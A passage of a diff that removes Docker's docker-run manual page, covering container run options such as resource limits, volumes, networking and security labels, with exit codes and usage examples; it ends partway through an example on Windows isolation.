-   Add a custom host-to-IP mapping (host:ip)
-
-   Add a line to /etc/hosts. The format is hostname:ip.  The **--add-host**
-option can be set multiple times.
-
-**--blkio-weight**=*0*
-   Block IO weight (relative weight) accepts a weight value between 10 and 1000.
-
-**--blkio-weight-device**=[]
-   Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`).
-
-**--cpu-shares**=*0*
-   CPU shares (relative weight)
-
-   By default, all containers get the same proportion of CPU cycles. This proportion
-can be modified by changing the container's CPU share weighting relative
-to the weighting of all other running containers.
-
-To modify the proportion from the default of 1024, use the **--cpu-shares**
-flag to set the weighting to 2 or higher.
-
-The proportion will only apply when CPU-intensive processes are running.
-When tasks in one container are idle, other containers can use the
-left-over CPU time. The actual amount of CPU time will vary depending on
-the number of containers running on the system.
-
-For example, consider three containers, one has a cpu-share of 1024 and
-two others have a cpu-share setting of 512. When processes in all three
-containers attempt to use 100% of CPU, the first container would receive
-50% of the total CPU time. If you add a fourth container with a cpu-share
-of 1024, the first container only gets 33% of the CPU. The remaining containers
-receive 16.5%, 16.5% and 33% of the CPU.
-
-On a multi-core system, the shares of CPU time are distributed over all CPU
-cores. Even if a container is limited to less than 100% of CPU time, it can
-use 100% of each individual CPU core.
-
-For example, consider a system with more than three cores. If you start one
-container **{C0}** with **-c=512** running one process, and another container
-**{C1}** with **-c=1024** running two processes, this can result in the following
-division of CPU shares:
-
-    PID    container	CPU	CPU share
-    100    {C0}		0	100% of CPU0
-    101    {C1}		1	100% of CPU1
-    102    {C1}		2	100% of CPU2
-
-**--cap-add**=[]
-   Add Linux capabilities
-
-**--cap-drop**=[]
-   Drop Linux capabilities
-
-**--cgroup-parent**=""
-   Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. Cgroups will be created if they do not already exist.
-
-**--cidfile**=""
-   Write the container ID to the file
-
-**--cpu-count**=*0*
-    Limit the number of CPUs available for execution by the container.
-    
-    On Windows Server containers, this is approximated as a percentage of total CPU usage.
-
-    On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last.
-
-**--cpu-percent**=*0*
-    Limit the percentage of CPU available for execution by a container running on a Windows daemon.
-
-    On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last.
-
-**--cpu-period**=*0*
-   Limit the CPU CFS (Completely Fair Scheduler) period
-
-   Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify.
-
-**--cpuset-cpus**=""
-   CPUs in which to allow execution (0-3, 0,1)
-
-**--cpuset-mems**=""
-   Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
-
-   If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1`
-then processes in your Docker container will only use memory from the first
-two memory nodes.
-
-**--cpu-quota**=*0*
-   Limit the CPU CFS (Completely Fair Scheduler) quota
-
-   Limit the container's CPU usage. By default, containers run with the full
-CPU resource. This flag tell the kernel to restrict the container's CPU usage
-to the quota you specify.
-
-**--cpu-rt-period**=0
-   Limit the CPU real-time period in microseconds
-
-   Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify.
-
-**--cpu-rt-runtime**=0
-   Limit the CPU real-time runtime in microseconds
-
-   Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex:
-   Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks.
-
-   The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup.
-
-**--cpus**=0.0
-   Number of CPUs. The default is *0.0* which means no limit.
-
-**-d**, **--detach**=*true*|*false*
-   Detached mode: run the container in the background and print the new container ID. The default is *false*.
-
-   At any time you can run **docker ps** in
-the other shell to view a list of the running containers. You can reattach to a
-detached container with **docker attach**. If you choose to run a container in
-the detached mode, then you cannot use the **-rm** option.
-
-   When attached in the tty mode, you can detach from the container (and leave it
-running) using a configurable key sequence. The default sequence is `CTRL-p CTRL-q`.
-You configure the key sequence using the **--detach-keys** option or a configuration file.
-See **config-json(5)** for documentation on using a configuration file.
-
-**--detach-keys**=""
-   Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
-
-**--device**=[]
-   Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)
-
-**--device-read-bps**=[]
-   Limit read rate from a device (e.g. --device-read-bps=/dev/sda:1mb)
-
-**--device-read-iops**=[]
-   Limit read rate from a device (e.g. --device-read-iops=/dev/sda:1000)
-
-**--device-write-bps**=[]
-   Limit write rate to a device (e.g. --device-write-bps=/dev/sda:1mb)
-
-**--device-write-iops**=[]
-   Limit write rate to a device (e.g. --device-write-iops=/dev/sda:1000)
-
-**--dns-search**=[]
-   Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)
-
-**--dns-option**=[]
-   Set custom DNS options
-
-**--dns**=[]
-   Set custom DNS servers
-
-   This option can be used to override the DNS
-configuration passed to the container. Typically this is necessary when the
-host DNS configuration is invalid for the container (e.g., 127.0.0.1). When this
-is the case the **--dns** flags is necessary for every run.
-
-**-e**, **--env**=[]
-   Set environment variables
-
-   This option allows you to specify arbitrary
-environment variables that are available for the process that will be launched
-inside of the container.
-
-**--entrypoint**=""
-   Overwrite the default ENTRYPOINT of the image
-
-   This option allows you to overwrite the default entrypoint of the image that
-is set in the Dockerfile. The ENTRYPOINT of an image is similar to a COMMAND
-because it specifies what executable to run when the container starts, but it is
-(purposely) more difficult to override. The ENTRYPOINT gives a container its
-default nature or behavior, so that when you set an ENTRYPOINT you can run the
-container as if it were that binary, complete with default options, and you can
-pass in more options via the COMMAND. But, sometimes an operator may want to run
-something else inside the container, so you can override the default ENTRYPOINT
-at runtime by using a **--entrypoint** and a string to specify the new
-ENTRYPOINT.
-
-**--env-file**=[]
-   Read in a line delimited file of environment variables
-
-**--expose**=[]
-   Expose a port, or a range of ports (e.g. --expose=3300-3310) informs Docker
-that the container listens on the specified network ports at runtime. Docker
-uses this information to interconnect containers using links and to set up port
-redirection on the host system.
-
-**--group-add**=[]
-   Add additional groups to run as
-
-**-h**, **--hostname**=""
-   Container host name
-
-   Sets the container host name that is available inside the container.
-
-**--help**
-   Print usage statement
-
-**--init**
-   Run an init inside the container that forwards signals and reaps processes
-
-**--init-path**=""
-   Path to the docker-init binary
-
-**-i**, **--interactive**=*true*|*false*
-   Keep STDIN open even if not attached. The default is *false*.
-
-   When set to true, keep stdin open even if not attached. The default is false.
-
-**--ip**=""
-   Sets the container's interface IPv4 address (e.g. 172.23.0.9)
-
-   It can only be used in conjunction with **--network** for user-defined networks
-
-**--ip6**=""
-   Sets the container's interface IPv6 address (e.g. 2001:db8::1b99)
-
-   It can only be used in conjunction with **--network** for user-defined networks
-
-**--ipc**=""
-   Default is to create a private IPC namespace (POSIX SysV IPC) for the container
-                               'container:<name|id>': reuses another container shared memory, semaphores and message queues
-                               'host': use the host shared memory,semaphores and message queues inside the container.  Note: the host mode gives the container full access to local shared memory and is therefore considered insecure.
-
-**--isolation**="*default*"
-   Isolation specifies the type of isolation technology used by containers. Note
-that the default on Windows server is `process`, and the default on Windows client
-is `hyperv`. Linux only supports `default`.
-
-**-l**, **--label**=[]
-   Set metadata on the container (e.g., --label com.example.key=value)
-
-**--kernel-memory**=""
-   Kernel memory limit (format: `<number>[<unit>]`, where unit = b, k, m or g)
-
-   Constrains the kernel memory available to a container. If a limit of 0
-is specified (not using `--kernel-memory`), the container's kernel memory
-is not limited. If you specify a limit, it may be rounded up to a multiple
-of the operating system's page size and the value can be very large,
-millions of trillions.
-
-**--label-file**=[]
-   Read in a line delimited file of labels
-
-**--link**=[]
-   Add link to another container in the form of <name or id>:alias or just <name or id>
-in which case the alias will match the name
-
-   If the operator
-uses **--link** when starting the new client container, then the client
-container can access the exposed port via a private networking interface. Docker
-will set some environment variables in the client container to help indicate
-which interface and port to use.
-
-**--link-local-ip**=[]
-   Add one or more link-local IPv4/IPv6 addresses to the container's interface
-
-**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*"
-  Logging driver for the container. Default is defined by daemon `--log-driver` flag.
-  **Warning**: the `docker logs` command works only for the `json-file` and
-  `journald` logging drivers.
-
-**--log-opt**=[]
-  Logging driver specific options.
-
-**-m**, **--memory**=""
-   Memory limit (format: <number>[<unit>], where unit = b, k, m or g)
-
-   Allows you to constrain the memory available to a container. If the host
-supports swap memory, then the **-m** memory setting can be larger than physical
-RAM. If a limit of 0 is specified (not using **-m**), the container's memory is
-not limited. The actual limit may be rounded up to a multiple of the operating
-system's page size (the value would be very large, that's millions of trillions).
-
-**--memory-reservation**=""
-   Memory soft limit (format: <number>[<unit>], where unit = b, k, m or g)
-
-   After setting memory reservation, when the system detects memory contention
-or low memory, containers are forced to restrict their consumption to their
-reservation. So you should always set the value below **--memory**, otherwise the
-hard limit will take precedence. By default, memory reservation will be the same
-as memory limit.
-
-**--memory-swap**="LIMIT"
-   A limit value equal to memory plus swap. Must be used with the  **-m**
-(**--memory**) flag. The swap `LIMIT` should always be larger than **-m**
-(**--memory**) value.  By default, the swap `LIMIT` will be set to double
-the value of --memory.
-
-   The format of `LIMIT` is `<number>[<unit>]`. Unit can be `b` (bytes),
-`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a
-unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap.
-
-**--mac-address**=""
-   Container MAC address (e.g. 92:d0:c6:0a:29:33)
-
-   Remember that the MAC address in an Ethernet network must be unique.
-The IPv6 link-local address will be based on the device's MAC address
-according to RFC4862.
-
-**--name**=""
-   Assign a name to the container
-
-   The operator can identify a container in three ways:
-    UUID long identifier (“f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778”)
-    UUID short identifier (“f78375b1c487”)
-    Name (“jonah”)
-
-   The UUID identifiers come from the Docker daemon, and if a name is not assigned
-to the container with **--name** then the daemon will also generate a random
-string name. The name is useful when defining links (see **--link**) (or any
-other place you need to identify a container). This works for both background
-and foreground Docker containers.
-
-**--network**="*bridge*"
-   Set the Network mode for the container
-                               'bridge': create a network stack on the default Docker bridge
-                               'none': no networking
-                               'container:<name|id>': reuse another container's network stack
-                               'host': use the Docker host network stack. Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure.
-                               '<network-name>|<network-id>': connect to a user-defined network
-
-**--network-alias**=[]
-   Add network-scoped alias for the container
-
-**--oom-kill-disable**=*true*|*false*
-   Whether to disable OOM Killer for the container or not.
-
-**--oom-score-adj**=""
-   Tune the host's OOM preferences for containers (accepts -1000 to 1000)
-
-**-P**, **--publish-all**=*true*|*false*
-   Publish all exposed ports to random ports on the host interfaces. The default is *false*.
-
-   When set to true publish all exposed ports to the host interfaces. The
-default is false. If the operator uses -P (or -p) then Docker will make the
-exposed port accessible on the host and the ports will be available to any
-client that can reach the host. When using -P, Docker will bind any exposed
-port to a random port on the host within an *ephemeral port range* defined by
-`/proc/sys/net/ipv4/ip_local_port_range`. To find the mapping between the host
-ports and the exposed ports, use `docker port`.
-
-**-p**, **--publish**=[]
-   Publish a container's port, or range of ports, to the host.
-
-   Format: `ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort`
-Both hostPort and containerPort can be specified as a range of ports.
-When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range.
-(e.g., `docker run -p 1234-1236:1222-1224 --name thisWorks -t busybox`
-but not `docker run -p 1230-1236:1230-1240 --name RangeContainerPortsBiggerThanRangeHostPorts -t busybox`)
-With ip: `docker run -p 127.0.0.1:$HOSTPORT:$CONTAINERPORT --name CONTAINER -t someimage`
-Use `docker port` to see the actual mapping: `docker port CONTAINER $CONTAINERPORT`
-
-**--pid**=""
-   Set the PID mode for the container
-   Default is to create a private PID namespace for the container
-                               'container:<name|id>': join another container's PID namespace
-                               'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure.
-
-**--userns**=""
-   Set the usernamespace mode for the container when `userns-remap` option is enabled.
-     **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`).
-
-**--pids-limit**=""
-   Tune the container's pids limit. Set `-1` to have unlimited pids for the container.
-
-**--uts**=*host*
-   Set the UTS mode for the container
-     **host**: use the host's UTS namespace inside the container.
-     Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure.
-
-**--privileged**=*true*|*false*
-   Give extended privileges to this container. The default is *false*.
-
-   By default, Docker containers are
-“unprivileged” (=false) and cannot, for example, run a Docker daemon inside the
-Docker container. This is because by default a container is not allowed to
-access any devices. A “privileged” container is given access to all devices.
-
-   When the operator executes **docker run --privileged**, Docker will enable access
-to all devices on the host as well as set some configuration in AppArmor to
-allow the container nearly all the same access to the host as processes running
-outside of a container on the host.
-
-**--read-only**=*true*|*false*
-   Mount the container's root filesystem as read only.
-
-   By default a container will have its root filesystem writable allowing processes
-to write files anywhere.  By specifying the `--read-only` flag the container will have
-its root filesystem mounted as read only prohibiting any writes.
-
-**--restart**="*no*"
-   Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped).
-
-**--rm**=*true*|*false*
-   Automatically remove the container when it exits. The default is *false*.
-   `--rm` flag can work together with `-d`, and auto-removal will be done on daemon side. Note that it's
-incompatible with any restart policy other than `none`.
-
-**--security-opt**=[]
-   Security Options
-
-    "label=user:USER"   : Set the label user for the container
-    "label=role:ROLE"   : Set the label role for the container
-    "label=type:TYPE"   : Set the label type for the container
-    "label=level:LEVEL" : Set the label level for the container
-    "label=disable"     : Turn off label confinement for the container
-    "no-new-privileges" : Disable container processes from gaining additional privileges
-
-    "seccomp=unconfined" : Turn off seccomp confinement for the container
-    "seccomp=profile.json :  White listed syscalls seccomp Json file to be used as a seccomp filter
-
-    "apparmor=unconfined" : Turn off apparmor confinement for the container
-    "apparmor=your-profile" : Set the apparmor confinement profile for the container
-
-**--storage-opt**=[]
-   Storage driver options per container
-
-   $ docker run -it --storage-opt size=120G fedora /bin/bash
-
-   This (size) will allow to set the container rootfs size to 120G at creation time.
-   This option is only available for the `devicemapper`, `btrfs`, `overlay2`  and `zfs` graph drivers.
-   For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size.
-   For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option.
-   Under these conditions, user can pass any size less then the backing fs size.
-
-**--stop-signal**=*SIGTERM*
-  Signal to stop a container. Default is SIGTERM.
-
-**--stop-timeout**=*10*
-  Timeout (in seconds) to stop a container. Default is 10.
-
-**--shm-size**=""
-   Size of `/dev/shm`. The format is `<number><unit>`.
-   `number` must be greater than `0`.  Unit is optional and can be `b` (bytes), `k` (kilobytes), `m`(megabytes), or `g` (gigabytes).
-   If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`.
-
-**--sysctl**=SYSCTL
-  Configure namespaced kernel parameters at runtime
-
-  IPC Namespace - current sysctls allowed:
-
-  kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced
-  Sysctls beginning with fs.mqueue.*
-
-  If you use the `--ipc=host` option these sysctls will not be allowed.
-
-  Network Namespace - current sysctls allowed:
-      Sysctls beginning with net.*
-
-  If you use the `--network=host` option these sysctls will not be allowed.
-
-**--sig-proxy**=*true*|*false*
-   Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied. The default is *true*.
-
-**--memory-swappiness**=""
-   Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
-
-**-t**, **--tty**=*true*|*false*
-   Allocate a pseudo-TTY. The default is *false*.
-
-   When set to true Docker can allocate a pseudo-tty and attach to the standard
-input of any container. This can be used, for example, to run a throwaway
-interactive shell. The default is false.
-
-The **-t** option is incompatible with a redirection of the docker client
-standard input.
-
-**--tmpfs**=[] Create a tmpfs mount
-
-   Mount a temporary filesystem (`tmpfs`) mount into a container, for example:
-
-   $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image
-
-   This command mounts a `tmpfs` at `/tmp` within the container.  The supported mount
-options are the same as the Linux default `mount` flags. If you do not specify
-any options, the systems uses the following options:
-`rw,noexec,nosuid,nodev,size=65536k`.
-
-**-u**, **--user**=""
-   Sets the username or UID used and optionally the groupname or GID for the specified command.
-
-   The followings examples are all valid:
-   --user [user | user:group | uid | uid:gid | user:gid | uid:group ]
-
-   Without this argument the command will be run as root in the container.
-
-**--ulimit**=[]
-    Ulimit options
-
-**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]
-   Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker
-   bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker
-   container. If 'HOST-DIR' is omitted,  Docker automatically creates the new
-   volume on the host.  The `OPTIONS` are a comma delimited list and can be:
-
-   * [rw|ro]
-   * [z|Z]
-   * [`[r]shared`|`[r]slave`|`[r]private`]
-   * [nocopy]
-
-The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR`
-can be an absolute path or a `name` value. A `name` value must start with an
-alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or
-`-` (hyphen). An absolute path starts with a `/` (forward slash).
-
-If you supply a `HOST-DIR` that is an absolute path,  Docker bind-mounts to the
-path you specify. If you supply a `name`, Docker creates a named volume by that
-`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR`
-value. If you supply the `/foo` value, Docker creates a bind-mount. If you
-supply the `foo` specification, Docker creates a named volume.
-
-You can specify multiple  **-v** options to mount one or more mounts to a
-container. To use these same mounts in other containers, specify the
-**--volumes-from** option also.
-
-You can add `:ro` or `:rw` suffix to a volume to mount it  read-only or
-read-write mode, respectively. By default, the volumes are mounted read-write.
-See examples.
-
-Labeling systems like SELinux require that proper labels are placed on volume
-content mounted into a container. Without a label, the security system might
-prevent the processes running inside the container from using the content. By
-default, Docker does not change the labels set by the OS.
-
-To change a label in the container context, you can add either of two suffixes
-`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file
-objects on the shared volumes. The `z` option tells Docker that two containers
-share the volume content. As a result, Docker labels the content with a shared
-content label. Shared volume labels allow all containers to read/write content.
-The `Z` option tells Docker to label the content with a private unshared label.
-Only the current container can use a private volume.
-
-By default bind mounted volumes are `private`. That means any mounts done
-inside container will not be visible on host and vice-a-versa. One can change
-this behavior by specifying a volume mount propagation property. Making a
-volume `shared` mounts done under that volume inside container will be
-visible on host and vice-a-versa. Making a volume `slave` enables only one
-way mount propagation and that is mounts done on host under that volume
-will be visible inside container but not the other way around.
-
-To control mount propagation property of volume one can use `:[r]shared`,
-`:[r]slave` or `:[r]private` propagation flag. Propagation property can
-be specified only for bind mounted volumes and not for internal volumes or
-named volumes. For mount propagation to work source mount point (mount point
-where source dir is mounted on) has to have right propagation properties. For
-shared volumes, source mount point has to be shared. And for slave volumes,
-source mount has to be either shared or slave.
-
-Use `df <source-dir>` to figure out the source mount and then use
-`findmnt -o TARGET,PROPAGATION <source-mount-dir>` to figure out propagation
-properties of source mount. If `findmnt` utility is not available, then one
-can look at mount entry for source mount point in `/proc/self/mountinfo`. Look
-at `optional fields` and see if any propagaion properties are specified.
-`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if
-nothing is there that means mount is `private`.
-
-To change propagation properties of a mount point use `mount` command. For
-example, if one wants to bind mount source directory `/foo` one can do
-`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This
-will convert /foo into a `shared` mount point. Alternatively one can directly
-change propagation properties of source mount. Say `/` is source mount for
-`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount.
-
-> **Note**:
-> When using systemd to manage the Docker daemon's start and stop, in the systemd
-> unit file there is an option to control mount propagation for the Docker daemon
-> itself, called `MountFlags`. The value of this setting may cause Docker to not
-> see mount propagation changes made on the mount point. For example, if this value
-> is `slave`, you may not be able to use the `shared` or `rshared` propagation on
-> a volume.
-
-To disable automatic copying of data from the container path to the volume, use
-the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes.
-
-**--volume-driver**=""
-   Container's volume driver. This driver creates volumes specified either from
-   a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag.
-   See **docker-volume-create(1)** for full details.
-
-**--volumes-from**=[]
-   Mount volumes from the specified container(s)
-
-   Mounts already mounted volumes from a source container onto another
-   container. You must supply the source's container-id. To share
-   a volume, use the **--volumes-from** option when running
-   the target container. You can share volumes even if the source container
-   is not running.
-
-   By default, Docker mounts the volumes in the same mode (read-write or
-   read-only) as it is mounted in the source container. Optionally, you
-   can change this by suffixing the container-id with either the `:ro` or
-   `:rw ` keyword.
-
-   If the location of the volume from the source container overlaps with
-   data residing on a target container, then the volume hides
-   that data on the target.
-
-**-w**, **--workdir**=""
-   Working directory inside the container
-
-   The default working directory for
-running binaries within a container is the root directory (/). The developer can
-set a different default with the Dockerfile WORKDIR instruction. The operator
-can override the working directory by using the **-w** option.
-
-# Exit Status
-
-The exit code from `docker run` gives information about why the container
-failed to run or why it exited.  When `docker run` exits with a non-zero code,
-the exit codes follow the `chroot` standard, see below:
-
-**_125_** if the error is with Docker daemon **_itself_** 
-
-    $ docker run --foo busybox; echo $?
-    # flag provided but not defined: --foo
-      See 'docker run --help'.
-      125
-
-**_126_** if the **_contained command_** cannot be invoked
-
-    $ docker run busybox /etc; echo $?
-    # exec: "/etc": permission denied
-      docker: Error response from daemon: Contained command could not be invoked
-      126
-
-**_127_** if the **_contained command_** cannot be found
-
-    $ docker run busybox foo; echo $?
-    # exec: "foo": executable file not found in $PATH
-      docker: Error response from daemon: Contained command not found or does not exist
-      127
-
-**_Exit code_** of **_contained command_** otherwise 
-    
-    $ docker run busybox /bin/sh -c 'exit 3' 
-    # 3
-
-# EXAMPLES
-
-## Running container in read-only mode
-
-During container image development, containers often need to write to the image
-content.  Installing packages into /usr, for example.  In production,
-applications seldom need to write to the image.  Container applications write
-to volumes if they need to write to file systems at all.  Applications can be
-made more secure by running them in read-only mode using the --read-only switch.
-This protects the containers image from modification. Read only containers may
-still need to write temporary data.  The best way to handle this is to mount
-tmpfs directories on /run and /tmp.
-
-    # docker run --read-only --tmpfs /run --tmpfs /tmp -i -t fedora /bin/bash
-
-## Exposing log messages from the container to the host's log
-
-If you want messages that are logged in your container to show up in the host's
-syslog/journal then you should bind mount the /dev/log directory as follows.
-
-    # docker run -v /dev/log:/dev/log -i -t fedora /bin/bash
-
-From inside the container you can test this by sending a message to the log.
-
-    (bash)# logger "Hello from my container"
-
-Then exit and check the journal.
-
-    # exit
-
-    # journalctl -b | grep Hello
-
-This should list the message sent to logger.
-
-## Attaching to one or more from STDIN, STDOUT, STDERR
-
-If you do not specify -a then Docker will attach everything (stdin,stdout,stderr)
-. You can specify to which of the three standard streams (stdin, stdout, stderr)
-you'd like to connect instead, as in:
-
-    # docker run -a stdin -a stdout -i -t fedora /bin/bash
-
-## Sharing IPC between containers
-
-Using shm_server.c available here: https://www.cs.cf.ac.uk/Dave/C/node27.html
-
-Testing `--ipc=host` mode:
-
-Host shows a shared memory segment with 7 pids attached, happens to be from httpd:
-
-```
- $ sudo ipcs -m
-
- ------ Shared Memory Segments --------
- key        shmid      owner      perms      bytes      nattch     status      
- 0x01128e25 0          root       600        1000       7                       
-```
-
-Now run a regular container, and it correctly does NOT see the shared memory segment from the host:
-
-```
- $ docker run -it shm ipcs -m
-
- ------ Shared Memory Segments --------
- key        shmid      owner      perms      bytes      nattch     status      
-```
-
-Run a container with the new `--ipc=host` option, and it now sees the shared memory segment from the host httpd:
-
- ```
- $ docker run -it --ipc=host shm ipcs -m
-
- ------ Shared Memory Segments --------
- key        shmid      owner      perms      bytes      nattch     status      
- 0x01128e25 0          root       600        1000       7                   
-```
-Testing `--ipc=container:CONTAINERID` mode:
-
-Start a container with a program to create a shared memory segment:
-```
- $ docker run -it shm bash
- $ sudo shm/shm_server &
- $ sudo ipcs -m
-
- ------ Shared Memory Segments --------
- key        shmid      owner      perms      bytes      nattch     status      
- 0x0000162e 0          root       666        27         1                       
-```
-Create a 2nd container correctly shows no shared memory segment from 1st container:
-```
- $ docker run shm ipcs -m
-
- ------ Shared Memory Segments --------
- key        shmid      owner      perms      bytes      nattch     status      
-```
-
-Create a 3rd container using the new --ipc=container:CONTAINERID option, now it shows the shared memory segment from the first:
-
-```
- $ docker run -it --ipc=container:ed735b2264ac shm ipcs -m
- $ sudo ipcs -m
-
- ------ Shared Memory Segments --------
- key        shmid      owner      perms      bytes      nattch     status      
- 0x0000162e 0          root       666        27         1
-```
-
-## Linking Containers
-
-> **Note**: This section describes linking between containers on the
-> default (bridge) network, also known as "legacy links". Using `--link`
-> on user-defined networks uses the DNS-based discovery, which does not add
-> entries to `/etc/hosts`, and does not set environment variables for
-> discovery.
-
-The link feature allows multiple containers to communicate with each other. For
-example, a container whose Dockerfile has exposed port 80 can be run and named
-as follows:
-
-    # docker run --name=link-test -d -i -t fedora/httpd
-
-A second container, in this case called linker, can communicate with the httpd
-container, named link-test, by running with the **--link=<name>:<alias>**
-
-    # docker run -t -i --link=link-test:lt --name=linker fedora /bin/bash
-
-Now the container linker is linked to container link-test with the alias lt.
-Running the **env** command in the linker container shows environment variables
- with the LT (alias) context (**LT_**)
-
-    # env
-    HOSTNAME=668231cb0978
-    TERM=xterm
-    LT_PORT_80_TCP=tcp://172.17.0.3:80
-    LT_PORT_80_TCP_PORT=80
-    LT_PORT_80_TCP_PROTO=tcp
-    LT_PORT=tcp://172.17.0.3:80
-    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
-    PWD=/
-    LT_NAME=/linker/lt
-    SHLVL=1
-    HOME=/
-    LT_PORT_80_TCP_ADDR=172.17.0.3
-    _=/usr/bin/env
-
-When linking two containers Docker will use the exposed ports of the container
-to create a secure tunnel for the parent to access.
-
-If a container is connected to the default bridge network and `linked`
-with other containers, then the container's `/etc/hosts` file is updated
-with the linked container's name.
-
-> **Note** Since Docker may live update the container's `/etc/hosts` file, there
-may be situations when processes inside the container can end up reading an
-empty or incomplete `/etc/hosts` file. In most cases, retrying the read again
-should fix the problem.
-
-
-## Mapping Ports for External Usage
-
-The exposed port of an application can be mapped to a host port using the **-p**
-flag. For example, an httpd port 80 can be mapped to the host port 8080 using the
-following:
-
-    # docker run -p 8080:80 -d -i -t fedora/httpd
-
-## Creating and Mounting a Data Volume Container
-
-Many applications require the sharing of persistent data across several
-containers. Docker allows you to create a Data Volume Container that other
-containers can mount from. For example, create a named container that contains
-directories /var/volume1 and /tmp/volume2. The image will need to contain these
-directories so a couple of RUN mkdir instructions might be required for you
-fedora-data image:
-
-    # docker run --name=data -v /var/volume1 -v /tmp/volume2 -i -t fedora-data true
-    # docker run --volumes-from=data --name=fedora-container1 -i -t fedora bash
-
-Multiple --volumes-from parameters will bring together multiple data volumes from
-multiple containers. And it's possible to mount the volumes that came from the
-DATA container in yet another container via the fedora-container1 intermediary
-container, allowing to abstract the actual data source from users of that data:
-
-    # docker run --volumes-from=fedora-container1 --name=fedora-container2 -i -t fedora bash
-
-## Mounting External Volumes
-
-To mount a host directory as a container volume, specify the absolute path to
-the directory and the absolute path for the container directory separated by a
-colon:
-
-    # docker run -v /var/db:/data1 -i -t fedora bash
-
-When using SELinux, be aware that the host has no knowledge of container SELinux
-policy. Therefore, in the above example, if SELinux policy is enforced, the
-`/var/db` directory is not writable to the container. A "Permission Denied"
-message will occur and an avc: message in the host's syslog.
-
-
-To work around this, at time of writing this man page, the following command
-needs to be run in order for the proper SELinux policy type label to be attached
-to the host directory:
-
-    # chcon -Rt svirt_sandbox_file_t /var/db
-
-
-Now, writing to the /data1 volume in the container will be allowed and the
-changes will also be reflected on the host in /var/db.
-
-## Using alternative security labeling
-
-You can override the default labeling scheme for each container by specifying
-the `--security-opt` flag. For example, you can specify the MCS/MLS level, a
-requirement for MLS systems. Specifying the level in the following command
-allows you to share the same content between containers.
-
-    # docker run --security-opt label=level:s0:c100,c200 -i -t fedora bash
-
-An MLS example might be:
-
-    # docker run --security-opt label=level:TopSecret -i -t rhel7 bash
-
-To disable the security labeling for this container versus running with the
-`--permissive` flag, use the following command:
-
-    # docker run --security-opt label=disable -i -t fedora bash
-
-If you want a tighter security policy on the processes within a container,
-you can specify an alternate type for the container. You could run a container
-that is only allowed to listen on Apache ports by executing the following
-command:
-
-    # docker run --security-opt label=type:svirt_apache_t -i -t centos bash
-
-Note:
-
-You would have to write policy defining a `svirt_apache_t` type.
-
-## Setting device weight
-
-If you want to set `/dev/sda` device weight to `200`, you can specify the device
-weight by `--blkio-weight-device` flag. Use the following command:
-
-   # docker run -it --blkio-weight-device "/dev/sda:200" ubuntu
-
-## Specify isolation technology for container (--isolation)
-
-This option is useful in situations where you are running Docker containers on
-Microsoft Windows. The `--isolation <value>` option sets a container's isolation
-technology. On Linux, the only supported is the `default` option which uses
-Linux namespaces. These two commands are equivalent on Linux:
-
-```
-$ docker run -d busybox top
-$ docker run -d --isolation default busybox top
-```
-
-On Microsoft Windows, can take any of these values:
-
-* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value.
-* `process`: Namespace isolation only.
-* `hyperv`: Hyper-V hypervisor partition-based isolation.
-
-In practice, when running on Microsoft Windows without a `daemon` option set,  these two commands are equivalent:
-
-```
